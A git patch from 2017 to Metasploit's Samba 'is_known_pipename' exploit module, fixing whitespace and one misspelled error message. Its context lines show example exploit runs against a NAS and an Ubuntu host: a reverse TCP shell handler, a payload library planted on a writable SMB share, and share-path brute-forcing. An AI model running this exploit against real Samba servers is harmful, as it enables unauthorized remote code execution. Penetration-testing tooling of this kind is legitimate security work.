From 28fb5cc7dad80944fa207a3ca28ed3766e2c43c4 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 30 May 2017 00:14:33 -0500 Subject: [PATCH] spelling --- .../modules/exploit/linux/samba/is_known_pipename.md | 12 ++++++------ modules/exploits/linux/samba/is_known_pipename.rb | 2 +- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/documentation/modules/exploit/linux/samba/is_known_pipename.md b/documentation/modules/exploit/linux/samba/is_known_pipename.md index ce62629dd4..3342fae90e 100644 --- a/documentation/modules/exploit/linux/samba/is_known_pipename.md +++ b/documentation/modules/exploit/linux/samba/is_known_pipename.md @@ -58,12 +58,12 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo ## Options **SMB_SHARE_NAME** - + The name of the SMB share containing a writeable directory. Shares are automatically scanned for, and if this variable is non-blank, it will be preferred. **SMB_SHARE_BASE** - + The remote filesystem path correlating with the SMB share name. This value is preferred, but other values are brute forced including: @@ -79,7 +79,7 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo 10. /tmp/home/home/shared **SMB_FOLDER** - + The directory to use within the writeable SMB share. Writable directories are automatically scanned for, and if this variable is non-blank, it will be preferred. @@ -90,7 +90,7 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo ``` msf exploit(is_known_pipename) > exploit -[*] Started reverse TCP handler on 1.2.3.117:4444 +[*] Started reverse TCP handler on 1.2.3.117:4444 [*] 1.2.3.119:445 - Using location \\1.2.3.119\ESX\ for the path [*] 1.2.3.119:445 - Payload is stored in //1.2.3.119/ESX/ as eePUbtdw.so [*] 1.2.3.119:445 - Trying location /volume1/eePUbtdw.so... @@ -107,9 +107,9 @@ Linux synologyNAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Lin ### Ubuntu 16.04 ``` -msf exploit(is_known_pipename) > exploit +msf exploit(is_known_pipename) > exploit -[*] Started reverse TCP handler on 192.168.0.3:4444 +[*] Started reverse TCP handler on 192.168.0.3:4444 [*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path [*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so [*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so... diff --git a/modules/exploits/linux/samba/is_known_pipename.rb b/modules/exploits/linux/samba/is_known_pipename.rb index 39db497718..a490b277a9 100644 --- a/modules/exploits/linux/samba/is_known_pipename.rb +++ b/modules/exploits/linux/samba/is_known_pipename.rb @@ -208,7 +208,7 @@ class MetasploitModule < Msf::Exploit::Remote def find_writeable find_writeable_share_path unless @share && @path - print_error("No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER") + print_error("No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER") fail_with(Failure::NoTarget, "No matching target") end print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")